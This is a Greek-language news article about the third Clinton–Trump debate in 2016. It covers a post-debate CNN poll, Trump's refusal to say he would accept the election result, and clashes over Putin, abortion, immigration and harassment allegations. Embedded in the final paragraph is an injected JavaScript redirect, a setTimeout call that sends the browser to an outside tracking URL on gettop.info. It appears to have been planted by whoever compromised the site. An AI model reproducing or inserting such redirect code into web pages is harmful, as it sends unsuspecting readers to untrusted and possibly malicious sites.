Προελαύνει η Χίλαρι μετά το τρίτο debate – Δεν θα δεχθεί τα αποτελέσματα των εκλογών, λέει ο Τραμπ

0
13

 

Μετά τη λήξη του τρίτου τηλεοπτικού debate, υποψήφια των Δημοκρατικών κέρδισε τις προτιμήσεις και τις εντυπώσεις, σύμφωνα με δημοσκόπηση του CNN.

Όπως δείχνουν τα αποτελέσματα του γκάλοπ που πραγματοποιήθηκε αμέσως μετά τη λήξη της τρίτης και τελευταίας τηλεοπτικής αντιπαράθεσης μεταξύ των δύο προεδρικών υποψηφίων, η Χίλαρι Κλίντον κέρδισε ποσοστό 52% των θετικών εντυπώσεων των τηλεθεατών, έναντι ποσοστού 39% του Ντόναλντ Τραμπ.

Χωρίς χειραψία ξεκίνησε και αυτή η τηλεοπτική αναμέτρηση ανάμεσα στους δύο προεδρικούς υποψηφίους η οποία είναι και η τελευταία τρεις εβδομάδες πριν από τις εκογές. Η Χίλαρι Κλιντον φέρεται να συνέτριψε τον αντίπαλό της σύμφωνα με τα αμερικανικά Μέσα βγαίνοντας νικήτρια και σ αυτό το debate. Βλέποντας το κλίμα να είναι αρνητικό απέναντί του ο Ντόναλντ Τραμπ τώρα απειλεί ότι ίσως και να μην αποδεχθεί τα αποτελέσματα των εκλογών αν δεν τον… βολεύουν. Μάλιστα δημοσίως αρνήθηκε να δηλώσει ότι θα δεχθεί τα αποτελέσματα των προεδρικών εκλογών στις Ηνωμένες Πολιτείες εάν χάσει από την Χίλαρι Κλίντον. Η υποψήφια των Δημοκρατικών χαρακτήρισε την αντίσταση του Τραμπ «τρομακτική».

Ο Τραμπ κατά καιρούς επαναλαμβάνει τη θέση του ότι σε περίπτωση ήττας του  οι εκλογές «θα είναι στημένες». Όταν ερωτήθηκε εάν θα δεχόταν τα αποτελέσματα, είπε, «Θα σας πω τότε. Θα σας κρατήσω σε αγωνία».

Έντονη υπήρξε η αντιπαράθεση ανάμεσα στους προεδρικούς υποψηφίυος με επίκεντρο τον Ρώσο πρόεδρος καθώς η Χίλαρι κατηγόρησε με δριμύτητα τον Τραμπ ότι έδειχνε μεγαλύτερη προτίμηση για τον Ρώσο πρόεδρο Πούτιν από ό,τι για Αμερικανούς στρατιωτικούς και ειδικούς πληροφοριών, ισχυριζόμενη ότι ο Πούτιν στηρίζει τον Τραμπ γιατί «θα προτιμούσε να είχε ένα ανδρείκελο για πρόεδρο των Ηνωμένων Πολιτειών«.

Ο Τραμπ απέρριψε κάθε σχέση με τον Πούτιν και είπε ότι καταδικάζει κάθε ξένη ανάμειξη στις εκλογές. Αρνήθηκε όμως εμφανώς και να δεχθεί την εκτίμηση των υπηρεσιών πληροφοριών ότι η Ρωσία είναι αναμεμειγμένη στην παραβίαση δεδομένων (χάκινγκ) των οργανώσεων των Δημοκρατικών.

Η τρίτη αναμέτρηση ξεκίνησε με μια μετρημένη συζήτηση επί πολιτικών θέσεων. Ο Τραμπ όμως επέστρεψε σύντομα στο προηγούμενο ύφος του, διακόπτοντας συνέχεια την Κλίντον και τον συντονιστή Κρις Ουάλας του καναλιού Fox News.

Οι δύο υποψήφιοι περιέγραψαν εντελώς αντίθετα σχέδια για το ανώτατο δικαστήριο (Άρειο Πάγο) υπό τις αντίστοιχες προεδρίες, με τον Ρεπουμπλικανό υποψήφιο να δηλώνει ότι η ιστορική απόφαση του δικαστηρίου που νομιμοποίησε τις αμβλώσεις (Roe versus Wade) θα ανατραπεί από τους δικούς τους δικαστικούς υποψήφιους. Η Κλίντον δεσμεύτηκε να διορίσει δικαστές που θα σεβαστούν την απόφαση, λέγοντας, «Έχουμε κάνει πολύ δρόμο για να γυρίσουμε πίσω τώρα».

Ο Τραμπ άσκησε πίεση στην Κλίντον σχετικά με τους μετανάστες, κατηγορώντας την ότι υποστηρίζει μια πολιτική «ανοικτών συνόρων», έναν χαρακτηρισμό που αυτή αρνήθηκε κατηγορηματικά. Ο Τραμπ, ο οποίος υποστηρίζει την κατασκευή ενός τοίχου κατά μήκος των συνόρων των ΗΠΑ με το Μεξικό, είπε ότι υπό την προεδρία της Κλίντον, «Οι άνθρωποι θα αρχίσουν να μπαίνουν σωρηδόν στη χώρα μας».

Για τον Τραμπ, η τηλεμαχία ήταν μια από τις τελευταίες ευκαιρίες που είχε για να αλλάξει την πορεία της υποψηφιότητάς του, ενώ η προεκλογική οργάνωση της Κλίντον κερδίζει έδαφος δυναμικά σε παραδοσιακά ρεπουμπλικανικές πολιτείες, ενώ οι ευκαιρίες του μειώνονται. Οι ρόσφατες αποκαλύψεις χυδαίων δηλώσεών του για τις γυναίκες και για μια σειρά ισχυρισμών ότι παρενόχλησε σεξουαλικά αρκετές γυναίκες έχουν πλήξει το προφίλ του.

Η Κλίντον ξεκίνησε τον ντιμπέιτ μπροστά από τον αντίπαλό της σε ποσοστά, στις περισσότερες επίμαχες πολιτείες. Η πρόκληση που έχει να αντιμετωπίσει είναι να συνεχίσει να αποδεικνύει ότι ο Τραμπ δεν είναι ικανός για να ασκήσει την προεδρία, και να αρχίσει να μειώνει τον διχασμό που επικρατεί στη χώρα της σε ολόκληρη την προεκλογική περίοδο, αν και οι Αμερικανοί αμφισβητούν επίμονα την εντιμότητά της και την αξιοπιστία της.

Η Κλίντον αντιμετώπισε για πρώτη φορά ερωτήσεις που αφορούν τις αποκαλύψεις για του ανώτατου στελέχους της τα ηλεκτρονικά μηνύματα, ενώ ο Τραμπαντιμετώπισε σειρά σεξουαλικών κατηγοριών από γυναίκες που βγήκαν στη δημοσιότητα αφού είχε αρνηθεί στην προηγούμενη τηλεμαχία ότι είχε φιλήσει ή θωπεύσει γυναίκες χωρίς την άδειά τους.  Ο Τραμπ αρνήθηκε τις κατηγορίες ξανά, λέγοντας ότι οι γυναίκες εμφανίστηκαν δημόσια γιατί «είτε θέλουν φήμη είτε το έκανε η καμπάνια της«, δείχνοντας την Κλίντον. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here